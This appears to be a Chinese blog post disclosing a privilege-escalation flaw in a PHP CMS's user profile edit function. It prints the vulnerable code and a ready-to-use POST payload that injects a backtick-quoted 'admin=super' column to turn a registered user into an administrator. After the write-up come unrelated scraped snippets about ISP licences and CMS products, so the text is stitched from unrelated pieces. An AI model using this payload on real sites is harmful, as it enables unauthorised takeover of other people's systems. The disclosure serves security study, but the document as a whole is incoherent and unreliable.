問題出在 使用者修改資料的地方
/system/module/user/control.php
public function edit($account = '')
$user = fixer::input('post')
->cleanint('imobile, qq, zipcode')
->setdefault('admin', 'no')
->remove('ip, account, join, visits')
->removeif(run_mode != 'admin', 'admin')
->get();
return $this->dao->update(table_user)
->data($user, $skip = 'password1,password2')
->autocheck()
->batchcheck($this->config->user->require->edit, 'notempty')
->check('email', 'email')
->check('email', 'unique', "account!='$account'")
->checkif($this->post->gtalk != false, 'gtalk', 'email')
->where('account')->eq($account)
->exec();
}fixer這個類的**有點長就不貼了,看上面的**也能大概看得懂它的作用。。
普通使用者和管理員是在乙個表的,的區別就是 admin欄位。
總之對我們post的資料做了 foreach然後帶入了 updata
當然他 有remove admin的,可是這太好繞過了。
直接看利用吧~
註冊使用者後
來到 http://localhost/user-edit.html
修改資料 改包
post如下資料
realname=aaaaaa&email=a%40qqqq.com&password1=&password2=&company=&address=&zipcode=&mobile=&phone=&qq`%3d1,`admin=super>alk=
即可提公升成為管理員。
可以看mysql的日誌
企業系統門戶需要哪些模組 哪些企業需要ISP許可證
isp許可證適用哪些經營範圍?isp是網際網路服務提供商的簡稱,網際網路 者所提供的服務可以很廣泛。除了為一般企業及私人網際網路瀏覽所提供的撥號連線 綜合業務數字網 dsl 纜線數據機 專線等服務外,還可以包括主機託管 電子郵件 網頁寄存等這些網際網路服務。3 電子郵件類的就是為終端使用者提供郵件傳...
創文地方門戶系統 v1 0 功能齊全
asp access資料庫組建,全站生成靜態,功能齊全,模板與程式分離,sql式資料呼叫,seo設定方便,完善的後台管理及使用者中心,結構整齊有絮,可生成html和xml 地圖,自定義單頁等功能,更多的功能等你來體驗,程式免費使用,新手可進qq群80552780裡學習模板標籤使用,自建漂亮的模板。有...
MoMoCMS企業建站系統 v4 5
momocms 默默企業建站系統 的設計原理 作為一名php程式設計師,見多了很多網路上的各式各樣的企業建站系統。然而,我並不滿意,很多系統更多的像乙個單一整站系統,而不是真正意義上的cms,後台選單項的繁瑣是我所不滿意的。cms重要的是什麼?不是seo,不是靜態化,不是全部後台智慧型控制。而是要有...